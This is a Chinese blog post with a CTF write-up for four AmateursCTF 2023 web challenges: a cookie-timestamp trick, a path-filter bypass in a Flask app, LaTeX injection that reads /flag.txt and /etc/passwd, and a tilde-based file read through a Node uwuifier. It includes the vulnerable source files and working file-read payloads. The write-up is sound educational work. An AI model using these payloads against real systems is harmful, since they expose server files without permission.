AmateursCTF 2023

最新推荐文章于 2023-10-22 20:42:45 发布
最新推荐文章于 2023-10-22 20:42:45 发布
阅读量156 收藏 2
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75316477/article/details/131865313
版权

1
更多内容在这篇博客

前言

虽然说这个比赛是针对于美国高中生的,可是也不是很简单,美国高中生这么D吗,该努力了。

web

waiting-an-eternity

我的朋友给我发了这个网站,并说如果我等得足够长,我就可以得到并举报!并不是说我需要一面旗帜或任何东西,但我已经等了几天了,它仍然要求我等待。我有点不耐烦了,你能帮我拿旗子吗?

抓包得到线索:
1
访问后发现每刷新一次set-cookie就会变一次,它跟时间也有一些关系。
2
那么我们添加一个cookie值
3
经过几次测试,当time为负数且足够小时就会出现flag。
3
这里时间的表示你可以正常表示,也可以使用科学计数法,也可以使用==-inf/-Infinity==来表示无穷小。

funny factorials

我制作了一个阶乘应用程序!它是如此的奇特和迷人。然而,阶乘似乎无法正确计算大数!你能帮我解决它吗?

1

分析数据包可以猜测在切换主题的数据包中有疑似文件读取漏洞。/?theme=themes/theme1.css,题目给的还有附件
app.py文件

from flask import Flask, render_template, request
import sys

app = Flask(__name__)

def factorial(n):
    if n == 0:
        return 1
    else:
        try:
            return n * factorial(n - 1)
        except RecursionError:
            return 1

def filter_path(path):
    # print(path)
    path = path.replace("../", "")
    try:
        return filter_path(path)
    except RecursionError:
        # remove root / from path if it exists
        if path[0] == "/":
            path = path[1:]
        print(path)
        return path

@app.route('/')
def index():
    safe_theme = filter_path(request.args.get("theme", "themes/theme1.css"))
    f = open(safe_theme, "r")
    theme = f.read()
    f.close()
    return render_template('index.html', css=theme)

@app.route('/', methods=['POST'])
def calculate_factorial():
    safe_theme = filter_path(request.args.get("theme", "themes/theme1.css"))

    f = open(safe_theme, "r")
    theme = f.read()
    f.close()
    try:
        num = int(request.form['number'])
        if num < 0:
            error = "Invalid input: Please enter a non-negative integer."
            return render_template('index.html', error=error, css=theme)
        result = factorial(num)
        return render_template('index.html', result=result, css=theme)
    except ValueError:
        error = "Invalid input: Please enter a non-negative integer."
        return render_template('index.html', error=error, css=theme)

if __name__ == '__main__':
    sys.setrecursionlimit(100)
    app.run(host='0.0.0.0')

dockerfile文件

FROM python:3.10-slim-buster

RUN pip3 install flask
COPY flag.txt /

WORKDIR /app
COPY app/* /app/
copy app/templates/* /app/templates/
copy app/themes/* /app/themes/

EXPOSE 5000

ENTRYPOINT ["python3", "app.py"]

可以得知flag文件名为flag.txt,path = path.replace("../", "")这里把../也给过滤了
绕过的话我试了试发现//flag.txt和..///flag.txt都可以绕过
1

latek

bryanguo(与ctf无关)一直说它的发音是latek,而不是像手套材料那样的乳胶。不管怎样,我制作了这个简单的应用程序,这样他就不再支付背页的费用了。
注意:标志仅在/flag.txt

1
这个就是一个在线的LaTex编辑器,将编辑的内容以pdf的文件形式展现出来,查看了一篇国外大佬的博客,介绍了LaTex注入的一些语法。

输入

\documentclass{article}
\begin{document}
Hello, world!
\input{/flag.txt}
\end{document}

会发现给出了一部分flag
1
那么另一部分怎么得到呢?借鉴了wp看到他使用了批处理模式

\batchmode:在 LaTeX 中,该命令会抑制所有终端和日志文件输出,这意味着编译过程不会在终端上产生任何消息或提示。它通常用于以批处理模式运行 LaTeX,在处理文档时不会中断用户输入或反馈。当您想要自动化文档生成过程时,这会很有帮助

\documentclass{article}
\begin{document}
Hello, world!
\batchmode
\input{/flag.txt}
\end{document}

\documentclass{article}
\begin{document}
Hello, world!
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
\end{document}

在LaTeX文档中,\usepackage{verbatim}用于导入名为"verbatim"的宏包,它提供了在文档中插入原始文本(verbatim文本)的功能。当你希望在文档中原样显示一段代码、配置文件或其他任何文本时,通常会使用该宏包。

1
参考链接
链接
链接

uwuctf

这个 rust uwuifier 速度太快了,我确信只要我能欺骗我的节点,它就会扩展到月球。uwuifier 即服务专业版何时订阅?
更新:zip 几乎与服务器相同,除了我们删除了challenge.yml 和flag.txt

1
这里就是访问上面的文件当我利用LFI漏洞时发现../被过滤了。后续测试了很多遍也没有思路。最后看见别人的wp结合源码
这是index.js文件


import {config} from "dotenv";
config();

import fs from "fs";
import path from "path";

import {quote} from "shell-quote";
import {exec} from "child_process";

const textsDir = path.join(process.cwd(), "public", "texts");
const uwuifierPath = path.join(process.cwd(),"uwuify");

import express from "express";
const app = express();

import morgan from "morgan";
app.set('trust proxy', ['loopback', 'linklocal', 'uniquelocal']);
app.use(morgan("combined"));

app.get("/", (req, res) => {
  res.sendFile("public/index.html", {
    root: process.cwd() // bug fix
  });
});


app.get("/uwuify", (req, res) => {
  res.type("txt");
  if(req.query.src){
    if(req.query.src.includes("..") || req.query.src.includes("./") || req.query.src.startsWith("/") || req.query.src.startsWith("-")){
      res.send("no hacking >:(");
      res.end();
      return;
    }
    let cmd = "cat " + quote([req.query.src]) + " | " + uwuifierPath;
    exec(cmd, {
      cwd: textsDir
    }, (err, stdout, stderr) => {
      res.send(stdout + stderr);
      res.end();
    });
  }else{
    res.send("no src provided");
  }
});

app.get("/dir", async (req, res) => {
    res.type("txt");
    let output = "texts avali to uwuify: ";
    let files = await fs.promises.readdir(textsDir);
    for(let file of files){
        output += "\r\n" + file;
    }
    output += "\r\n\r\nUse /uwuify?src=<text file name> to uwuify a text file!";
    res.send(output);
});

app.listen(process.env.PORT || 3000, () => {
  console.log("Server Up!");
});

这是dockerfile文件

FROM node:16
COPY ./* /home/node/app/
COPY ./public/* /home/node/app/public/
COPY ./public/texts/* /home/node/app/public/texts/
WORKDIR /home/node/app
RUN npm install
ENV PORT=8082
RUN chown -R node:node /home/node/app
USER node
CMD ["bash", "launch.sh"]
EXPOSE 8082

可以看到实际上flag.txt就在/home/node/app/flag.txt
读取当前目录使用~,其实https://uwuasaservice.amt.rs/uwuify?src=~也就是cat ~,这个时候爆出路径

cat: /home/node: Is a directory

那么下面就直接读取flag文件
https://uwuasaservice.amt.rs/uwuify?src=~/app/flag.txt

amateuwsctf{so_wmao_this_fwag_is_gonna_be_a_wot_wongew_than_most_fwag_othew_fwags_good_wuck_have_fun_decoding_it_end_of_fwag}

n0rt6
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Buu-[WUSTCTF2020]大数计算 1
seven749的博客
11-16 1333
Buu-[WUSTCTF2020]大数计算 1 首先打开题目附件 根据题目要求来看分为了四个部分。 part1是计算2020的阶乘后取其前8位,转化为16进制。 利用C++写一个大数阶乘的代码 #include <bits/stdc++.h> using namespace std; int main() { while(1) { string ans = "1"; int cnt; cout<<"要计算几的阶乘?"<<endl; cin>&
[buuctf] crypto全解——85-120(不建议直接抄flag)
ao52426055的博客
11-24 8065
yxx 查看题目 啥也不是没看懂 用010查看进制 32位,再来查看明文.txt发现刚好也是32位字符,于是怀疑这道题是道一次性密码本OTP的题目,将明文与密文的txt一位一位异或即可得到flag 上脚本 python2的 h=['0A','03','17','02','56','01','15','11','0A','14','0E','0A','1E','30','0E','0A','1E','30','0E','0A','1E','30','14','0C','19','0D','1F','10'
ctf-3】数论基础+Crypto初步
JacinLee的博客
05-09 3965
ctf训练第三周,进行数论基础初步学习与Crypto的练习!
题目36:数的长度
杨林峰的笔记
10-12 226
题目链接:http://acm.nyist.net/JudgeOnline/problem.php?cid=330&cpid=36描述N!阶乘是一个非常大的数,大家都知道计算公式是N!=N*(N-1)······*2*1.现在你的任务是计算出N!的位数有多少(十进制)?输入首行输入n,表示有多少组测试数据(n<10) 随后n行每行输入一组测试数据 N( 0 < N < 1000000 )输出对于每
FSCTF竞赛中学到的知识和总结(第一次打比赛)
s_a2g1a3j1的博客
10-22 259
1,越快做越好,不要拖延,不懂的及时百度,开赛前半个小时先看看各块的签到题和简单题,(尤其是crypto和misc),把每个题都看一下2,赛前一定要把工具和环境配置好,省的还要花时间3,比赛过程中还会出新题,要时刻关注比赛(说不定就出了一个送分题,如下图)最后记录一下第一次比赛的成绩(纯纯小白菜鸡)
BUUCTF 每日打卡 2021-4-26
weixin_52446095的博客
04-26 198
引言 一道 babyRSA 搞了一晚上[捂脸] 因为一些 sb 错误 babyRSA 加密代码如下: import sympy import random def myGetPrime(): A= getPrime(513) print(A) B=A-random.randint(1e3,1e5) print(B) return sympy.nextPrime((B!)%A) p=myGetPrime() #A1=21856963452461630437348278
[AmateursCTF 2023] 太难了
weixin_52640415的博客
07-21 531
MT19937 梅森旋转randint的取值过程
【2019 Roar CTF】baby RSA + 威尔逊定理 + python写脚本小结
未配妥剑 已入江湖
10-22 913
Baby RSA 题目内容: import sympy import random def myGetPrime(): A= getPrime(513) print(A) B=A-random.randint(1e3,1e5) print(B) return sympy.nextPrime((B!)%A) p=myGetPrime() #A1=...
CTF 竞赛入门指南(CTF All In One)学习(十)
m_pNext的博客
07-16 445
密码学导论密码学密码使用学对称密钥算法公开密钥算法密码分析学古典密码学常见替换密码单表置换密码凯撒密码简单替换密码仿射密码 密码学 密码使用学 密码分析学 密码使用学 无密钥算法 对称密钥算法 公开密钥算法   对称密钥算法 双方共享一个密钥,并使用相同的加密和解密算法。 相关术语: 明文:被传递的消息。用 M 表示。对于计算机,M 指的是 2 进制。 密文:加密后的消息。用 C 表示,对于计算机,C 指的是 2 进制。 加密函数:作用于明文 M,得到密文 C,用 E 表示。 数学公式:???
个人总结-网络安全学习和CTF必不可少的一些网站
宛十八的专栏
04-07 7751
学习的地方很多,不能一一列举,一些优秀的网址和博客可能也没有提到,大家补充吧:P 就简单总结一些常用的吧,本人是十足的彩笔,还望大家多多指点,表哥们带我飞Orz http://www.sec-wiki.com/skill/ 安全技能(里面渗透逆向编程都有介绍) http://blog.knownsec.com/Knownsec_RD_Checklist/ 知道创宇研发技能表v3.0 安
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8331
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
多彩简约风2024年终总结报告动态PPT模板
07-12
【作品名称】:多彩简约风2024年终总结报告动态PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
广西财经学院考研14个学院,72个专业课历年考试真题及答案汇总整理,备考资料题库视频
07-12
广西财经学院考研14个学院,72个专业课历年考试真题及答案汇总整理,备考资料题库视频
人工智能相关完整教程 C++
07-12
关于C++开发工程师在人工智能领域的一般性信息、技术栈、项目案例以及测试方法等方面的指导和建议。 专业技能与成就 编程语言与技术栈:精通C++,熟悉Python(常用于AI领域),了解机器学习库如TensorFlow, PyTorch等。 项目类型:参与过计算机视觉、自然语言处理、数据挖掘等AI项目。 关键技术问题:解决过高并发数据处理、算法优化、内存管理等技术难题。 软件测试:运用单元测试、集成测试和性能测试确保软件质量,使用过Google Test等测试框架。 项目案例 假设项目:基于C++的图像识别系统 技术栈:OpenCV, C++, TensorFlow C++ API 问题解决:通过多线程处理提升图像处理速度,使用TensorFlow C++ API部署训练好的模型进行实时预测。 测试技能:编写单元测试验证图像处理模块的准确性,进行压力测试以确保系统稳定性。 职业规划 短期目标:深入学习最新的AI技术和算法,如深度学习、强化学习等。 长期目标:成为AI领域的解决方案专家,为复杂的业务问题提供高效的软件解决方案。
Apache Dubbo:Dubbo服务治理:负载均衡与容错机制
07-12
Apache Dubbo:Dubbo服务治理:负载均衡与容错机制 Dubbo是著名的RCP框架,文档内有干货,提供代码和可复现的命令,值得借鉴。
Spring Cloud 帮助开发者构建和管理分布式系统
07-12
Spring Cloud 是一组工具和框架,旨在帮助开发者构建和管理分布式系统。它提供了各种功能,使得在微服务架构中进行服务发现、配置管理、负载均衡、断路器等变得简单。以下是 Spring Cloud 的几个主要组成部分和特点:
Riptide GP_com.vectorunit.bluehuawei_12_1.3.3__103013.apk
最新发布
07-12
Riptide GP_com.vectorunit.bluehuawei_12_1.3.3__103013.apk
C语言教程基础介绍以及简单使用方法之格式化输入输出.md
07-12
c C语言教程基础介绍以及简单使用方法之格式化输入输出.md C语言教程基础介绍以及简单使用方法之格式化输入输出.md C语言教程基础介绍以及简单使用方法之格式化输入输出.md C语言教程基础介绍以及简单使用方法之格式化输入输出.md C语言教程基础介绍以及简单使用方法之格式化输入输出.md
MT8870A-EL6100产品简介
07-12
MT8870A-EL6100产品简介

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值